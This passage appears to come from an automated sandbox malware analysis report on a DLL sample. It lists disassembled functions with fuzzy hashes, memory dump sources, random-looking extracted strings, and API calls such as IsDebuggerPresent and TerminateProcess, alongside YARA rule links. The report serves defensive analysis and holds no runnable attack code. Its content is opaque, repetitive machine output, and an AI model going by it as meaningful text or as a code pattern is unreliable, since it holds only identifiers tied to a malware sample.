                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: .X~l$.X~l$K3T$rPz$rPz$xe2
                                                                                                                                                                                                                                              • API String ID: 0-1598945147
                                                                                                                                                                                                                                              • Opcode ID: b574ebe418ff676d1ff8b80d1618d5589b80c5314a5bea7fa6ce2143d91705ed
                                                                                                                                                                                                                                              • Instruction ID: e614f7159c6b099f64c36c9b7ca53b710ecf23fe3d492109c2d192515dfccd88
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b574ebe418ff676d1ff8b80d1618d5589b80c5314a5bea7fa6ce2143d91705ed
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91322436A995508FCB04CE7CD5D53EE7BF2EB47328F309219D425DBF90D22A885A8B41
                                                                                                                                                                                                                                              Function 6CE138D0 Relevance: 7.8, Strings: 5, Instructions: 1529COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Dz5)$eG/q$l9:b$l9:b$~9Ew
                                                                                                                                                                                                                                              • API String ID: 0-2836437484
                                                                                                                                                                                                                                              • Opcode ID: e90a0ef43dcc10224373e11d71759b4aa215bb60b50c2e5f9f08130348aaece8
                                                                                                                                                                                                                                              • Instruction ID: e43d0bca6c583cec9b14880e0faa84522611ce57d89b45b149ce6bcb0b5d7a83
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e90a0ef43dcc10224373e11d71759b4aa215bb60b50c2e5f9f08130348aaece8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2B21376B496418FDF08CEBCC4957CD7BF2AB47329F21511AD425EBF94C62A880A8F41
                                                                                                                                                                                                                                              Function 6CE2CFC0 Relevance: 6.9, Strings: 5, Instructions: 650COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ^gj$^gj$pWh#$pWh#$Ob]
                                                                                                                                                                                                                                              • API String ID: 0-777673351
                                                                                                                                                                                                                                              • Opcode ID: 31dc5e815395a46f4fc7b3ea5a2d31121c317a2b0d865133074a573edf54facf
                                                                                                                                                                                                                                              • Instruction ID: b714cc12a39e182d0bb6060de1f4364732cedb10ec56c071ce9d2980c246a71c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31dc5e815395a46f4fc7b3ea5a2d31121c317a2b0d865133074a573edf54facf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29329B7AE452058FCB08CEACD5817DDBBF2AB47314F24851AE511EBB54C63E9A0ACF01
                                                                                                                                                                                                                                              Function 6CDFC480 Relevance: 6.9, Strings: 5, Instructions: 622COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • ocdxlonrhtobxzbmmppsktncfvbqheqvmuejpgo, xrefs: 6CDFCBA3, 6CDFCDBE
                                                                                                                                                                                                                                              • `v@, xrefs: 6CDFC6FE
                                                                                                                                                                                                                                              • lgwqcvyumsawjugnzuzdxweouksulrgoelgmoekalxmlkgeuziduyrvyqxzlwaxspsrxpywqvhwcnmucaxvevtz, xrefs: 6CDFC7B1
                                                                                                                                                                                                                                              • laqxkqcpfyvpakmoyctaiwbatatssaylldhvrbchranhq, xrefs: 6CDFCB89, 6CDFCDA4
                                                                                                                                                                                                                                              • dscxnioflcvqa, xrefs: 6CDFC7C8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: `v@$dscxnioflcvqa$laqxkqcpfyvpakmoyctaiwbatatssaylldhvrbchranhq$lgwqcvyumsawjugnzuzdxweouksulrgoelgmoekalxmlkgeuziduyrvyqxzlwaxspsrxpywqvhwcnmucaxvevtz$ocdxlonrhtobxzbmmppsktncfvbqheqvmuejpgo
                                                                                                                                                                                                                                              • API String ID: 0-967752511
                                                                                                                                                                                                                                              • Opcode ID: 91c5f46955d2d1456a3e3e6a6fcbd7cb62606f6741fb542659f3ffc90668ec6a
                                                                                                                                                                                                                                              • Instruction ID: fceba8b620521901dd565c30885600ed61ee5c14c59502ffcd6693063409f581
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91c5f46955d2d1456a3e3e6a6fcbd7cb62606f6741fb542659f3ffc90668ec6a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF427BB4A002088FDB04DFACC995B9E7BF1BF46308F124198D8199F761DB75A949CF92
                                                                                                                                                                                                                                              Function 6CE2EF12 Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CE2EF1E
                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 6CE2EFEA
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CE2F00A
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 6CE2F014
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 254469556-0
                                                                                                                                                                                                                                              • Opcode ID: 99ac77ec974ebcc05f46af676780aef1d1d3f117d9fac71f1487e759d88ac09d
                                                                                                                                                                                                                                              • Instruction ID: 13789affc0a512a71272510632ec99dbacbd0879a1d9c809e51634f76e22869d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99ac77ec974ebcc05f46af676780aef1d1d3f117d9fac71f1487e759d88ac09d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB312BB5D4522C9BDF20DFA5D989BCDBBB8BF08304F10419AE40DA7240EB795A898F54
                                                                                                                                                                                                                                              Function 6CE25B20 Relevance: 5.7, Strings: 4, Instructions: 742COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: CpK$O8C|$O8C|$bad array new length
                                                                                                                                                                                                                                              • API String ID: 0-719153901
                                                                                                                                                                                                                                              • Opcode ID: c00825cf4c9565a4e8df013217d3c71be22a21379d117b00345e7b6db40f5ace
                                                                                                                                                                                                                                              • Instruction ID: 82fc642f2fc9db6155f58bd47040e0bebd1f99a9cfa6bc77e990624f805e3fe4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c00825cf4c9565a4e8df013217d3c71be22a21379d117b00345e7b6db40f5ace
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F232F276B855018FCF09CE7CDA953DE37F6A747368F305629D421DBB98C12E8A0A8B40
                                                                                                                                                                                                                                              Function 6CE130E0 Relevance: 5.6, Strings: 4, Instructions: 571COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: )TuJ$)TuJ$_81j$_81j
                                                                                                                                                                                                                                              • API String ID: 0-726387471
                                                                                                                                                                                                                                              • Opcode ID: 271241e45f08aa0f5695485f0ac060cd8f9b2b15041f0f11f7de21bc8660112d
                                                                                                                                                                                                                                              • Instruction ID: a7c377b3ed13151d36897dc145d890c4af5c4ac312d2f556cafdd027bc8b328e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 271241e45f08aa0f5695485f0ac060cd8f9b2b15041f0f11f7de21bc8660112d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8612F576B482118FCF08CE7CC9943DD7BF2AB4B365F208619D425EBF94C72A881A8755
                                                                                                                                                                                                                                              Function 6CE17860 Relevance: 5.4, Strings: 4, Instructions: 434COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: \x<!$\x<!$d~_D$d~_D
                                                                                                                                                                                                                                              • API String ID: 0-1002557758
                                                                                                                                                                                                                                              • Opcode ID: f9744634639ec766c7a2aa082bbe2e33338f95b5bdc0ac2fbde5ad8c949f672a
                                                                                                                                                                                                                                              • Instruction ID: a30ac52d1bdaafd2e59876e738ae2b86c94afbf28bc1a59a43995332631d3719
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9744634639ec766c7a2aa082bbe2e33338f95b5bdc0ac2fbde5ad8c949f672a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AE1F776B485128FDF08CE7CC5953DE7BF29B47729F319119D511EBB90C22A8E0A8B90
                                                                                                                                                                                                                                              Function 6CE1A6D0 Relevance: 4.9, Strings: 3, Instructions: 1127COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Wjd$Wjd$B7
                                                                                                                                                                                                                                              • API String ID: 0-2249100413
                                                                                                                                                                                                                                              • Opcode ID: 1e82e3bcc097b533398cfaad6c4894267f3227d1694741e6de0d84cb02b92e7d
                                                                                                                                                                                                                                              • Instruction ID: ebc648050ac7448f89ac72bbf82876351b0fc3c8b50fbaf4af98f38360e22923
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e82e3bcc097b533398cfaad6c4894267f3227d1694741e6de0d84cb02b92e7d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A882C076E596048FCF04CFBCC5E57EE7BF2AB47324F209619D425DBB94C629880A8B41
                                                                                                                                                                                                                                              Function 6CE313FC Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CE314F4
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CE314FE
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CE3150B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                                              • Opcode ID: 9ef31c3364527a1112a0f488fc630ce552f19c234ef428a1457d5e405b64d483
                                                                                                                                                                                                                                              • Instruction ID: df0d672925640c45cd7fac900f0f9e35b3f360d19642a0ec52e1c5d4bbabd180
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ef31c3364527a1112a0f488fc630ce552f19c234ef428a1457d5e405b64d483
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1731B3B5901228ABCB21DF64D888BCCBBB8BF08314F6052DAE41DA7250E7749F858F55
                                                                                                                                                                                                                                              Function 6CE31AE2 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,6CE31AE1,?,00000001,?,?), ref: 6CE31B04
                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,6CE31AE1,?,00000001,?,?), ref: 6CE31B0B
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 6CE31B1D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                              • Opcode ID: b6da5ae9edf8ca12d483433be5c1af6897f99cfca23886e9c37c61862688cbc8
                                                                                                                                                                                                                                              • Instruction ID: 2ff08be09c848220c00fb2f06f96144c310b1a50217c2e8c2903358917f9af70
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6da5ae9edf8ca12d483433be5c1af6897f99cfca23886e9c37c61862688cbc8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68E04631240118EBCF222BE0C948A883B79EB01789B214028F80C86631DB39F986CB80
                                                                                                                                                                                                                                              Function 6CE2B620 Relevance: 4.5, Strings: 3, Instructions: 753COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: etS$jr^i$jr^i
                                                                                                                                                                                                                                              • API String ID: 0-2030300318
                                                                                                                                                                                                                                              • Opcode ID: 9c6727ac7d0518c37cb6d9557568a6930e5ca128aed37eab55c4194cc87af286
                                                                                                                                                                                                                                              • Instruction ID: d5a7b35104afba32e058db6aae0d63df4ab12cb8828f583aea301b7eaf2a6d2c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c6727ac7d0518c37cb6d9557568a6930e5ca128aed37eab55c4194cc87af286
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A32F536B415018FDF08CDBCC9D57DE77F2AB47354F309629D522ABB94C62E890A8B90
                                                                                                                                                                                                                                              Function 6CE0F2E0 Relevance: 4.1, Strings: 2, Instructions: 1600COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "xD;$"xD;
                                                                                                                                                                                                                                              • API String ID: 0-2864981526
                                                                                                                                                                                                                                              • Opcode ID: 2193f10a5a8fc40357047bd6ab7ca9a5dc93f2b4f4ec6a431a78ad1cb2b83ff7
                                                                                                                                                                                                                                              • Instruction ID: 35674e15b204143e6a162b3aee01e3c4a83ba64c6e6fc104c7262966c0bd7685
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2193f10a5a8fc40357047bd6ab7ca9a5dc93f2b4f4ec6a431a78ad1cb2b83ff7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15C22576B496418FCF04CEBCC6953CD7BF2AB43364F349514D421DBB98D62E892A8B81
                                                                                                                                                                                                                                              Function 6CE22130 Relevance: 4.1, Strings: 2, Instructions: 1555COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Vmp$Vmp
                                                                                                                                                                                                                                              • API String ID: 0-3901100813
                                                                                                                                                                                                                                              • Opcode ID: 289c027b29b7eefbef0ec21a6da14beba24c40d0550da31d88031ff497433c75
                                                                                                                                                                                                                                              • Instruction ID: c4173da0f8efe730845e8868af51c7c0eaee55206e620693a12b2600c5cab304
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 289c027b29b7eefbef0ec21a6da14beba24c40d0550da31d88031ff497433c75
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57B20E7AA552028FDF08CE7CD5D93CE77F2AB53364F3481159862DBB95C62E890A8F40
                                                                                                                                                                                                                                              Function 6CE193C0 Relevance: 3.5, APIs: 2, Instructions: 485COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f60eb36aa6478aace6beeccf11c6d46a6a1f3143be03206460dead8c38e9ef10
                                                                                                                                                                                                                                              • Instruction ID: 5814fa30c3ad990a82d0b592aac91fb3faf5c73d85a31e7b4d9bb35d9d86a2c0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f60eb36aa6478aace6beeccf11c6d46a6a1f3143be03206460dead8c38e9ef10
